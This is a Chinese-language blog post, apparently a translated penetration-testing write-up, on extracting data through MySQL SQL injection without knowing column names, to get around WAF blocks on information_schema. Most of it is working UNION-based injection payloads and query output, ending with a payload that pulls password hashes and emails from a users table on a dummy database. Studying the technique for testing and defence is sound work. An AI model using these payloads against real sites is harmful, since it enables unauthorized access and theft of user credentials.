对MySQL(版本号小于5)中列名的情况下提取数据,或者在列入WAF黑名单的情况下在请求中发送information_schema

0x00 简介

您可以略过:
您或许会遇到以下这种情况:您必须从MySQL DB中转储某个表中的某些数据,要完成这一目标,您需要知道转储的表名和列名:
例如在版本号小于5的MYSQL,甚至在版本号大于等于5的MYSQL中,WAF将information_schema的任何调用都列进了黑名单,这就是我们讨论的情况。
在这种情况下,获取DB服务器版本甚至DB名称就足以证明该漏洞的严重性。
我们能对于这种漏洞进入更深次的研究,尽可能地获得最高权限。
我们首先暴力破解表名,紧接着暴力破解列名。
我们得到的唯一有用的表名:users 。
我们继续暴力破解列名,只返回一个有效的列名id,这不足以获得进一步的访问权限。

0x01 无列名注入

和队友@aboul3la一起,我们创建了一个虚拟SQL DB,用来模拟目标SQL DB,找寻一种在不知道列名的情况下,从表中提取数据的方法。以下方法是基于我们大量的试错之后得到的。
执行以下普通查询将返回用户表内容:

MariaDB [dummydb]> select * from users;
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| id | name         | password                                 | email                       | birthdate  | added               |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
|  1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | [email protected]      | 1981-05-03 | 1993-03-20 14:03:14 |
|  2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | [email protected]   | 1979-10-28 | 2007-01-20 18:38:29 |
|  3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | [email protected]        | 2005-11-16 | 1992-02-16 04:19:05 |
|  4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | [email protected]          | 2015-07-22 | 2014-03-05 22:57:18 |
|  5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | [email protected] | 1991-11-22 | 2005-12-04 20:38:41 |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+

选择的列:name, password, email, birthdate, added
下一步是将列名转换为任何可选的已知值,
可以用SQL将其转换为:

MariaDB [dummydb]> select 1,2,3,4,5,6 union select * from users;
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2            | 3                                        | 4                           | 5          | 6                   |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2            | 3                                        | 4                           | 5          | 6                   |
| 1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | [email protected]      | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | [email protected]   | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | [email protected]        | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | [email protected]          | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | [email protected] | 1991-11-22 | 2005-12-04 20:38:41 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+

Great!列:name, password, email, birthdate, added被1,2,3,4,5,6替代,
查询语句SELECT 1、2、3、4、5、6。
下一步是根据新的数值选择数据,可以通过添加表alias,从上一个查询中选择field_number来完成。
使用下面的查询

select `4` from (select 1,2,3,4,5,6 union select * from users)redforce

将选择引用email地址列的'4'列,

MariaDB [dummydb]> select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;
+-----------------------------+
| 4                           |
+-----------------------------+
| 4                           |
| [email protected]      |
| [email protected]   |
| [email protected]        |
| [email protected]          |
| [email protected] |
+-----------------------------+
6 rows in set (0.00 sec)

将其更改为3将返回password,2将返回name。

Screen-Shot-2019-02-09-at-8.49.43-PM.png

将其与我们的注入payload结合成为最终payload。

-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -

实际情况实际结合。

MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-------+
| author_id | title |
+-----------+-------+
|         1 | alias |
+-----------+-------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------------------------+
| author_id | title                                    |
+-----------+------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |
+-----------+------------------------------------------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------+
| author_id | title                  |
+-----------+------------------------+
|         1 | [email protected] |
+-----------+------------------------+
1 row in set (0.00 sec)

22.png

0x02 简而言之

您可以通过从目标表中选择所有内容,将列名转换为任何已知的值,然后使用这些值作为SELECT查询中的字段来实现这一点。
最终payload

MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title                                                           |
+-----------+-----------------------------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:[email protected] |

标签: none

添加新评论